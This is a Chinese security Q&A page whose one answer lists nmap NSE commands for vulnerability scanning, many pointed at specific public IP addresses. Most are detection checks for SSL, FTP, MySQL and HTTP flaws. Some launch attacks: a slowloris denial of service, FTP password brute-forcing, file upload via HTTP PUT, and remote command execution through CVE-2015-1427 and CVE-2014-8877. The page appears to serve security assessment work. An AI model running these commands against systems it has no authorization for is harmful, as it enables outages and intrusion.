scream

nmap如何进行漏洞扫描

分享
回答 1
浏览 839
  • 安全小白成长记 2 信息安全等级高级测评师 CISP-PTE
    安全小白成长记2 信息安全等级高级测评师 CISP-PTE

    nmap扫描漏洞命令如下:

    http 拒绝服务

    ``` nmap --max-parallelism 800--script http-slowloris scanme.nmap.org ```

    IIS 短文件泄露

    ``` nmap -p 8080 --script http-iis-short-name-brute 61.142.64.176 ```

    ftp弱口令暴力破解

    ``` nmap --script ftp-brute --script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passwords.txt,brute.threads=3,brute.delay=6 203.195.139.153 ```

    检测CVE-2011-2523中的ftp-vsftpd-backdoor

    ``` nmap -T2 --script ftp-vsftpd-backdoor 211.139.201.240 ```

    验证http中开启的-methods 方法

    ``` nmap -T3 --script http-methods --script-args http.test-all=true,http.url-path=/www.XXX.com ```

    验证HTTP.sys 远程代码执行

    ``` nmap -sV --script http-vuln-cve2015-1635 203.195.139.153 ```

    验证 SSL POODLE information leak

    ``` nmap -sV -p 443 --version-light --script ssl-poodle 218.19.141.16 ```

    验证http 中开启了put 方法

    ``` nmap --script http-put --script-args http-put.url=/uploads/testput.txt,http-put.file=/root/put.txt 218.19.141.16 ```

    验证mysql 匿名访问

    ``` nmap --script mysql-empty-password 203.195.139.153 ```

    验证cve2015-1427 漏洞

    ``` nmap --script http-vuln-cve2015-1427 --script-args command=ls 203.195.139.153 ```

    验证cve2014-8877漏洞

    ``` nmap -Pn --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877.uri=/wordpress 42.96.170.128 ```

    验证Cisco ASA中的CVE-2014-2126,CVE-2014-2127,CVE-2014-21,CVE-2014-2129漏洞

    ``` nmap -p 443 --script http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129 203.195.139.153 ```

    验证低安全的 SSHv1,sslv2协议

    ``` nmap --script sshv1,sslv2 ```

    验证CVE-2014-0224 ssl-ccs-injection

    ``` nmap -Pn --script ssl-ccs-injection 203.195.139.153 ```

    验证ssl-cert证书问题

    ``` nmap -v -v --script ssl-cert 203.195.139.153 ```

    验证SSL证书的有限期

    ``` nmap -Pn --script ssl-date ```

    验证CVE-2014-0160 OpenSSL Heartbleed bug

    ``` nmap -p 443 --script ssl-heartbleed,ssl-known-key 203.195.139.153 ```

    验证 Debian OpenSSL keys

    ``` nmap -p 443 --script ssl-known-key 203.195.139.153 ```

    验证弱加密SSL套件

    ``` nmap --script ssl-enum-ciphers 203.195.139.153 ```

    验证CVE 2015-4000

    ``` nmap --script ssl-dh-params ```

    验证多种SSL漏洞问题

    ``` nmap 203.195.139.153 --vv --script sshv1,ssl-ccs-injection,ssl-cert,ssl-date,ssl-dh-params,ssl-enum-ciphers,ssl-google-cert-catalog,ssl-heartbleed,ssl-known-key,sslv2 ```

    在网络中检测某主机是否存在窃听他人流量

    ``` nmap --script sniffer-detect 10.10.167.5 ```
    分享
    微信二维码
    • 推荐文章
    相关问题
    热门回答
    写回答
    © 2022 WANGAN.COM 帮助网安从业者成长;关注产业发展,做网络安全忠诚卫士!